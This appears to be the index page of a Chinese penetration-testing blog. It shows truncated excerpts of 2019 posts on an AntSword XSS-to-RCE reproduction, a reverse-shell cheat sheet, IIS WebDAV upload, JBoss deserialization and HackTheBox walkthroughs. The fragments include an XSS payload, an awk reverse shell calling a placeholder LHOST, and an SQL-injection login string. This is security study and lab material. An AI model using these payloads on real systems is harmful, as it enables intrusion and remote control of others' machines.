RCE Vulnerability in antSword前几天蚁剑暴X®S©S(E),所以复现看看 123<?phpheader('HTTP/1.1 500 <img src=# onerror=alert(/AntSword-XSS/)>');?> 弹shell 写入自己喜欢的弹shell方式到,exec()内,然后进行base64加密 perl: 123require('child_proce 2019-04-14 漏洞复现 #X(R)S(C)S(E)
Reverse-shells常用反弹shell姿势 原文作者:Antonios Tsolis Awk 1awk 'BEGIN {s = "/inet/tcp/0/LHOST/LPORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ wh 2019-04-05 转载搬运 #备忘录 #Shell
Microsoft IIS WebDAV Write Access Code Execution某天,在网上逛了逛发现了个iis 6站,http所有方法都开了。古老的iis6,存在文件解析漏洞。So。。。。。 使用py脚本进行put一个shell的txt文件,然后copy成.asp;txt尾缀的新文件。 123456789101112131415161718192021import urllib2def iisput(): url="http://example.com/q.txt 2019-04-04 技术水文 #Web
Middleware version information leaked原文:倾旋 https://payloads.online/archivers/2018-04-18/2 0x00 中间件版本信息泄露 什么是中间件版本信息泄露 通常在HTTP报文的响应头中存在的标志、版本号等信息均属于中间件的版本信息泄露。 中间件版本信息泄露的特点 通常出现在默认安装好的Web中间件上,大部分管理员都不会修改这个标志。 0x01 中间件版本信息泄露-风险等级 ** 低 ** 0 2019-03-05 转载搬运 #Web安全测试
远程代码执行原文:倾旋 https://payloads.online/archivers/2018-03-22/1 0x00 远程代码执行-介绍 什么是远程代码执行 远程命令执行 英文名称:RCE (remote code execution) ,简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 2019-03-02 转载搬运 #Web安全测试
Jboss反序列化漏洞(CVE-2017-12149)漏洞介绍 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下就将来自客户端的数据流进行反序列化,从而导致了漏洞。远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。 漏洞复现 克隆 vulnhub 的项目到本地,cd到对应的文件夹,启动docker 2019-02-18 漏洞复现 #CVE #JBoss
小本本--备忘录枚举 常规枚举 显示详细信息,同步,扫描所有端口,使用所有脚本,不探测主机是否存活 1nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.1 显示详细信息,SYN扫描,版本信息和针对服务的脚本。 1nmap -v -sS -A -T4 192.168.1.1 扫描易受攻击的SMB服务器的Nmap脚本 注意:unsafe = 1可能会导致中断 1nmap –scri 2019-02-09 杂项 #备忘录
HackTehBox-SecNotes信息收集 1nmap -p- -sV 10.10.10.97 开放了80、445、8808三个端口 访问80端口,是个登录页面,注册一个账号 12user:' w'or 1='1pass:' w'or 1='1 注册成功,使用【w’or 1='1】登录,发现第三个笔记疑似smb之类的账号密码 使用 smbclient 尝试登录smb 2019-02-02 技术水文 #靶机渗透
HackTheBox-Irked信息收集 扫描目标机器开放的端口 12345masscan -p1-65535 10.10.10.117 --rate=1000 -e tun0 > portsports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $ 2019-01-31 技术水文 #靶机渗透
HackTheBox-Popcorn目标: 在靶机中找到user.txt和root.txt文件 信息收集 用nmap扫描端口信息 123456789101112131415161718┌─[root@parrot]─[~]└──╼ #nmap -sC -sV 10.10.10.6Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-16 13:29 ESTNmap scan repor 2019-01-26 技术水文 #靶机渗透